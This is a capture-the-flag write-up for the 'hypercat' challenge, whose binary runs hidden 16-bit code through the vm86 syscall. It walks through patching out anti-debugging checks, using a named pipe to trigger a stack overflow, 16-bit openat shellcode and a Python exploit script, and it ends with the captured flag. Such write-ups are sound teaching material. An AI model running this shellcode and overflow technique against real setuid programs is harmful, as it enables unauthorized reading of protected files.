  $ cat file
  hello
  $ ./hypercat file
  hello

However, running hypercat on the key file doesn't print anything. After analyzing the executable in IDA, we find the following:

  * the binary first allocates a large region of memory at 0x10000 using mmap
  * then it xor-decrypts a chunk of bytes from .data with a key of 0xCC and copies them to 0x10100
  * copies argv[1] (the file name passed as parameter) to 0x102e3
  * then it sets up a vm86plus_struct structure and repeatedly calls vm86 in a loop

It also has some anti-debugging features which we must bypass in order to be able to run it under gdb:

  * aborts if prctl(PR_GET_DUMPABLE) != 1 - we change a "jnz" to "jmp" to bypass it
  * checks for the AT_SECURE auxiliary vector and stores its value into some variable. This value will be 1 when running a setuid program and 0 otherwise. To bypass this we simply write 1 to that variable, unconditionally.
  * checks if (uid == euid) and, if so, writes 0 to a variable - we nop this check.

== The vm86 call ==

vm86 is a Linux syscall which provides controlled access to the CPU's virtual 8086 mode (i.e. running 16bit code from 32bit protected mode). In our case it is actually used as an anti-debugging technique, since you can't easily debug the code that runs in virtual 8086 mode. Anyway, in order to use vm86 you first have to fill a vm86plus_struct with the initial values for the registers, then call the vm86 syscall with a subfunction parameter (in our case, VM_ENTER).
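As a side note, the XOR step from the analysis list above is easy to reproduce offline when extracting the 16bit code. The following is only a minimal sketch: the function names are made up for illustration, and the `offset` and `length` parameters are hypothetical, since the location and size of the encrypted chunk in .data are not given in this writeup and have to be read from the disassembly.

```python
def xor_decrypt(blob: bytes, key: int = 0xCC) -> bytes:
    """XOR every byte of blob with a single-byte key (0xCC per the analysis)."""
    return bytes(b ^ key for b in blob)


def extract_code(binary: bytes, offset: int, length: int) -> bytes:
    """Slice the encrypted chunk out of the file image and decrypt it.

    offset and length are hypothetical parameters: the real values are
    not stated in the writeup and must come from the disassembly.
    """
    return xor_decrypt(binary[offset:offset + length])


# Self-check on synthetic data: "int 0x80" (bytes CD 80) encrypted with 0xCC.
sample = bytes([0xCD ^ 0xCC, 0x80 ^ 0xCC])
print(xor_decrypt(sample).hex())  # cd80
```

Because XOR with a fixed key is its own inverse, the same function both encrypts and decrypts.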
The vm86 struct is set up like this:

  vm86_str.regs.eip = (__int32)((char *)mmap_addr + 0x100);
  vm86_str.regs.esp = (__int32)((char *)mmap_addr + 65534);
  vm86_str.regs.eax = 172;
  vm86_str.regs.ebx = 3;
  vm86_str.regs.ecx = 0;
  vm86_str.regs.edx = 0;
  vm86_str.regs.esi = 0;
  vm86_str.regs.edi = 0;
  vm86_str.regs.cs = (unsigned int)mmap_addr >> 4;
  vm86_str.regs.ss = (unsigned int)mmap_addr >> 4;
  vm86_str.regs.ds = (unsigned int)mmap_addr >> 4;
  vm86_str.regs.es = (unsigned int)mmap_addr >> 4;
  vm86_str.regs.fs = (unsigned int)mmap_addr >> 4;
  vm86_str.regs.gs = (unsigned int)mmap_addr >> 4;
  vm86_str.regs.eflags = 0;

So, we see that eip starts at 0x10100, the address where that chunk of data was decrypted. This means that the mysterious data is actually some 16bit code. We extract it from the binary for further analysis.

The main loop of the program looks something like this:

  lock_called = 0;
  while (1) {
      ret = vm86(VM_ENTER, &vm86_str);
      if ((ret & 0xff) != 2) {
          goto uninteresting_stuff;
      }
      if ((ret >> 8) != 0x80) {
          goto uninteresting_stuff;
      }
      if (vm86_str.regs.eax == __NR_lock)
          lock_called = 1;
      else if (vm86_str.regs.eax != __NR_open)
          do_syscall_with_params_from_vm86_str();
      else {
          stat(vm86_str.regs.ebx, &stat_buf);
          if (!lock_called && ((stat_buf.st_mode & S_IFMT) != S_IFLNK) && !strstr(vm86_str.regs.ebx, "key"))
              do_syscall_with_params_from_vm86_str();
      }
  }

When vm86 returns, the reason for returning is placed in the least significant 8 bits. A code of 2 means "exit due to the execution of an int instruction". The next 8 bits hold the number of the interrupt: the program wants them to be 0x80. So basically, the program waits until the vm86 code tries to do a syscall. If the syscall is not "lock" or "open", it is carried out without further checks. The lock syscall is emulated after a fashion, since Linux doesn't implement it. The interesting checks are for "open": the file shouldn't be a symlink and shouldn't have the string "key" in its name.
That's why "hypercat /home/hypercat/key" doesn't work. The program also denies the execve syscall (not depicted in the pseudocode above).

== The 16bit code ==

It consists of two parts: the first one relocates the second part from 1000:01AA to FFFF:7010, and also changes the stack segment from 1000 to FFFF. The second part does the actual job:

  * opens the file
  * checks (using fstat) that the file does not exceed 256 bytes in size (and prints a nice "buffer overflow" message if it does)
  * reads the file's contents
  * writes the contents to stdout

== The exploit ==

First, let's find out why our file shouldn't be bigger than 256 bytes. While we can't debug the 16bit code, we can still inspect its state before every syscall it makes (remember that every int 80h causes the vm86 mode to exit). So, let's break before the read syscall.

  gdb-peda$ b *0x8048a12 if (*(unsigned *)($esp+0xa8 + 0x18) == 0x3)
  Breakpoint 1 at 0x8048a12
  gdb-peda$ r file
  [----------------------------------registers-----------------------------------]
  EAX: 0x8002
  EBX: 0x1
  ECX: 0xbffff2d8 --> 0x7
  EDX: 0x1
  ESI: 0xa67 ('g\n')
  EDI: 0x102e0 --> 0x66cc0a67
  EBP: 0xbffff3b8 --> 0xbffff438 --> 0x0
  ESP: 0xbffff230 --> 0x1
  EIP: 0x8048a12 (mov DWORD PTR [esp+0x48],eax)
  EFLAGS: 0x203 (CARRY parity adjust zero sign trap INTERRUPT direction overflow)
  [-------------------------------------code-------------------------------------]
     0x8048a02: mov DWORD PTR [esp+0x4],eax
     0x8048a06: mov DWORD PTR [esp],0x1
     0x8048a0d: call 0x8048540
  => 0x8048a12: mov DWORD PTR [esp+0x48],eax
     0x8048a16: mov eax,DWORD PTR [esp+0x48]
     0x8048a1a: movzx eax,al
     0x8048a1d: cmp eax,0x2
     0x8048a20: je 0x8048a4b
  [------------------------------------stack-------------------------------------]
  0000| 0xbffff230 --> 0x1
  0004| 0xbffff234 --> 0xbffff2d8 --> 0x7
  0008| 0xbffff238 --> 0x58 ('X')
  0012| 0xbffff23c --> 0x32 ('2')
  0016| 0xbffff240 --> 0xffffffff
  0020| 0xbffff244 --> 0x0
  0024| 0xbffff248 --> 0xbffff4c0 --> 0x20 (' ')
  0028| 0xbffff24c --> 0xbffff464 --> 0xbffff589 ("/root/hypercat3")
  [------------------------------------------------------------------------------]
  Legend: code, data, rodata, value
  Breakpoint 1, 0x08048a12 in ?? ()

The vm86plus_struct is at esp+0xa8, and eax has an offset of 0x18 inside the structure. Let's see what address is passed to the read syscall. This would be ecx (offset 4).

  gdb-peda$ x/xw ($esp+0xa8 + 0x4)
  0xbffff2dc: 0x0010fee8
  gdb-peda$ x/260xb 0x0010fee8
  0x10fee8: 0x01 0x08 0x00 0x00 0x49 0x00 0x06 0x00
  0x10fef0: 0xa4 0x81 0x01 0x00 0x00 0x00 0x00 0x00
  0x10fef8: 0x00 0x00 0x00 0x00 0x06 0x00 0x00 0x00
  0x10ff00: 0x00 0x10 0x00 0x00 0x08 0x00 0x00 0x00
  0x10ff08: 0x99 0x5c 0x13 0x53 0xf0 0x95 0x1e 0x01
  0x10ff10: 0x50 0x57 0x0a 0x53 0x84 0x7a 0x7b 0x13
  0x10ff18: 0x50 0x57 0x0a 0x53 0x84 0x7a 0x7b 0x13
  0x10ff20: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
  0x10ff28: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
  0x10ff30: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
  0x10ff38: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
  0x10ff40: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
  0x10ff48: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
  0x10ff50: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
  0x10ff58: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
  0x10ff60: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
  0x10ff68: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
  0x10ff70: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
  0x10ff78: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
  0x10ff80: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
  0x10ff88: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
  0x10ff90: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
  0x10ff98: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
  0x10ffa0: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
  0x10ffa8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
  0x10ffb0: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
  0x10ffb8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
  0x10ffc0: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
  0x10ffc8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
  0x10ffd0: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
  0x10ffd8: 0x00 0x00 0x00 0x00 0x00 0x00 0x10 0x70
  0x10ffe0: 0x00 0x00 0xff 0xff 0x07 0x00 0x00 0x00
  0x10ffe8: 0x13 0x70 0x00 0x00

We see the value 0x7013 immediately after those 256 bytes. What does this value mean? We recall that the code is relocated from 0x1AA to 0x7010. Let's take a look:

{{:writeups:h1.png|}}

So 0x7013 corresponds to 0x1AD, the return address from sub_1B7 (sub_1B7 is the function that implements the second stage of the 16bit code). If we could read more than 256 bytes from the file, we could overwrite this return address. Let's look closer at the file size validation:

{{:writeups:h2.png|}}

The final value of edx (what read(2) receives) is something like ( (size-1) & 0xffff ). The check can be bypassed with a pipe: fstat will report a size of 0, and edx will get a value of 0xffff, more than enough.

Now, what should we overwrite the return address with? We would like to return to the beginning of our buffer (0x10fee8), but keep in mind that we're in 16bit mode: the return address is 2 bytes long, and cs was previously set to 0xffff. So, we have:

  (0xffff << 4) + ip = 0x10fee8
  => ip = 0x10fee8 - 0xffff0 = 0xfef8

== The shellcode ==

The last part of the exploit is the shellcode. The shellcode will also run in 16bit mode, and we can't directly open the key file and also can't execve.
One solution is to use openat instead of open:

  .code16
  .text
      call 2f
  1:
      pop %ecx              // compute the full address of the string
      and $0xffff, %ecx
      add $0xffff0, %ecx
      mov $295, %eax        // __NR_openat
      mov $-100, %ebx       // not important
      mov $0, %edx          // O_RDONLY
      mov $0, %esi          // not important
      int $0x80
      mov %eax, %ebx
      mov $3, %eax          // __NR_read
      mov $50, %edx
      int $0x80
      mov $4, %eax          // __NR_write
      mov $1, %ebx
      int $0x80
      mov $1, %eax          // __NR_exit
      mov $10, %ebx
      int $0x80
  2:
      call 1b
  path:
      .asciz "/home/hypercat/key"

And the final exploit:

  #!/usr/bin/env python
  from struct import pack
  f = open('shell.bin', 'r')
  shell = f.read()
  f.close()
  p = ''
  p += shell
  p += 'a' * (256 - len(p))
  p += pack('

And running it (on the local machine):

  $ echo 'This is a key' > /home/hypercat/key
  $ mkfifo thepipe
  $ ./exploit.py > thepipe &
  [1] 9719
  $ ./hypercat3 thepipe
  èWfYfáÿÿfÁðÿf¸'f»ÿÿÿfºf¾̀fÃf¸fº2̀f¸f»̀f¸f» è¦ÿ/home/hypercat/keyaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaøþ
  This is a key
  /keyaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[1]+ Done ./exploit.py > thepipe

And remote:

  guest@notroot-virtual-machine:/tmp/ch$ /home/hypercat/hypercat thepipe
  èWfYfáÿÿfÁðÿf¸'f»ÿÿÿfºf¾̀fÃf¸fº2̀f¸f»̀f¸f» è¦ÿ/home/hypercat/keyaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaøþ
  HArD0ar3_vxRT2ALIZ4T1on_IS_4lwWaY5_FuN
  aaaaaaaaaaa[1]+ Done
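The return-address arithmetic and the payload layout from the exploit section can be double-checked with a short Python 3 sketch. It is an illustration under stated assumptions, not the original script: the helper names are made up, the little-endian 16-bit packing (`"<H"`) is an assumption (the corresponding line of the exploit is truncated in this copy, although the trailing `øþ` bytes, i.e. F8 FE, in the output above are consistent with it), and the constants are the values observed in the gdb session.

```python
import struct

BUF_LINEAR = 0x10FEE8  # linear address of the read buffer, as seen in gdb
CODE_SEGMENT = 0xFFFF  # cs after the first stage relocates the code
BUF_SIZE = 256         # bytes between the buffer start and the saved ip


def real_mode_offset(linear: int, segment: int) -> int:
    """Solve (segment << 4) + offset == linear for a 16-bit offset."""
    offset = linear - (segment << 4)
    if not 0 <= offset <= 0xFFFF:
        raise ValueError("address not reachable from this segment")
    return offset


def build_payload(shellcode: bytes) -> bytes:
    """Shellcode, padded to 256 bytes, followed by the new return address.

    Assumption: the saved ip is stored little-endian right after the buffer.
    """
    if len(shellcode) > BUF_SIZE:
        raise ValueError("shellcode does not fit in the buffer")
    ret = real_mode_offset(BUF_LINEAR, CODE_SEGMENT)
    return shellcode.ljust(BUF_SIZE, b"a") + struct.pack("<H", ret)


print(hex(real_mode_offset(BUF_LINEAR, CODE_SEGMENT)))  # 0xfef8
```

Writing the result of `build_payload` to the pipe in binary mode (for example through `sys.stdout.buffer`) would mirror what the exploit script does.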